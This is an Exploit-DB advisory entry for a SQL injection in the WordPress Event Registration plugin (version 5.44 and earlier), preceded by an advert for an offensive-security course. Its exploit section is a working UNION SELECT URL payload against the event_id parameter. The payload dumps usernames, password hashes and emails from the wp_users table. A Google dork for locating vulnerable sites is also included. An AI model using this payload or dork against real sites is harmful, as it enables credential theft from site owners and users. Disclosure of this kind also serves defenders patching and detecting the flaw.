WordPress Plugin Event Registration 5.44 - SQL Injection

EDB-ID:

17814


Author:

serk

Type:

webapps


Platform:

PHP

Date:

2011-09-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44


[ exploit ]

domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--